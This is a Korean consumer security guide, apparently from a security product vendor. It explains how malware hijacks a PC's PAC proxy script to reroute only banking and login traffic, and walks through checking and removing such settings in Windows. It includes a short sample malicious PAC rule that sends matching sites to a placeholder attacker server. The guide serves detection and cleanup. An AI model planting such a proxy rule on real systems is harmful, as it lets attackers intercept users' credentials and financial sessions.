다른 사이트는 다 되는데 은행·로그인 페이지만 유독 느리거나 인증서 경고가 뜬다면, PC 의 프록시 설정을 확인하세요. 정보 탈취·광고 악성코드는 PC 의 「자동 프록시 설정 스크립트(PAC)」에 한 줄을 걸어, 특정 사이트로 가는 길만 자기 서버를 거치게 만듭니다.
프록시와 PAC 가 무엇인가
프록시는 PC 와 인터넷 사이에 서는 중간 서버입니다. 회사에서는 보안·통제를 위해 정상적으로 씁니다. PAC 는 「어떤 주소는 프록시로, 어떤 주소는 바로」를 정하는 작은 스크립트 파일입니다. 이게 악용되면 이렇게 됩니다.
if (shExpMatch(host, "*은행*") || shExpMatch(host, "*login*"))
return "PROXY 공격자서버:8080";
return "DIRECT";
나머지 사이트는 모두 정상이라 눈치채기 어렵고, 노리는 사이트만 가로챕니다.
Windows 설정에서 확인
- 설정 → 네트워크 및 인터넷 → 프록시.
- 「자동으로 설정 검색」은 켜져 있어도 대개 정상입니다.
- 「설정 스크립트 사용」이 켜져 있고 주소가 적혀 있다면 그 주소를 확인합니다.
- 「수동 프록시 설정」에 서버 주소가 있다면 역시 확인 대상입니다.
판단 기준
| 보이는 것 | 판단 |
|---|---|
| 집 PC 인데 스크립트·수동 프록시가 켜져 있다 | 본인이 VPN·개발 도구로 설정한 기억이 없다면 의심. |
file:///C:/Users/... 처럼 PC 안의 파일을 가리킨다 | 사용자 폴더의 PAC 파일은 정상 프로그램이 거의 쓰지 않습니다. 의심. |
http://127.0.0.1:포트/... (자기 자신) | 보안 프로그램·회사 에이전트가 쓰기도 하지만 악성도 씁니다. 그 포트를 연 프로그램이 무엇인지 확인해야 합니다. |
| 회사 도메인의 주소, 회사 PC | 대개 전산팀 설정입니다. 건드리지 마세요. |
숨은 곳 두 군데 더
- WinHTTP 프록시 — Windows 업데이트 같은 시스템 통신이 쓰는 별도 설정입니다. 명령 프롬프트에서
netsh winhttp show proxy. 「직접 액세스(프록시 서버 없음)」이 정상입니다. - WPAD — 네트워크에서 프록시 설정을 자동으로 찾는 기능입니다. hosts 파일에
wpad라는 이름이 낯선 주소로 고정되어 있다면 의심하세요(0.0.0.0 wpad처럼 막아 둔 것은 정상입니다).
고치는 법
- 스크립트 주소가 PC 안의 파일이라면, 그 파일을 메모장으로 열어 어떤 사이트를 어디로 보내는지 확인하고 내용을 캡처해 둡니다(나중에 신고·상담할 때 필요).
- 설정 화면에서 「설정 스크립트 사용」을 끕니다.
- 그 PAC 를 걸어 둔 프로그램이 남아 있으면 다시 켜집니다. 전체 검사와 시작 프로그램·예약 작업 점검을 함께 하세요.
- 은행·로그인 사이트만 가로채는 모양이었다면, 그 기간에 로그인한 계정의 비밀번호를 다른 기기에서 바꾸세요.
울타리 NEO 는 사용자·시스템·정책 네 곳의 PAC 설정과 WinHTTP·WPAD 를 함께 읽고, PC 안의 PAC 는 실행하지 않고 내용만 읽어 「금융·로그인만 가로채는 모양」인지 판정합니다. 해제는 원래 값을 백업한 뒤 되돌릴 수 있게 합니다.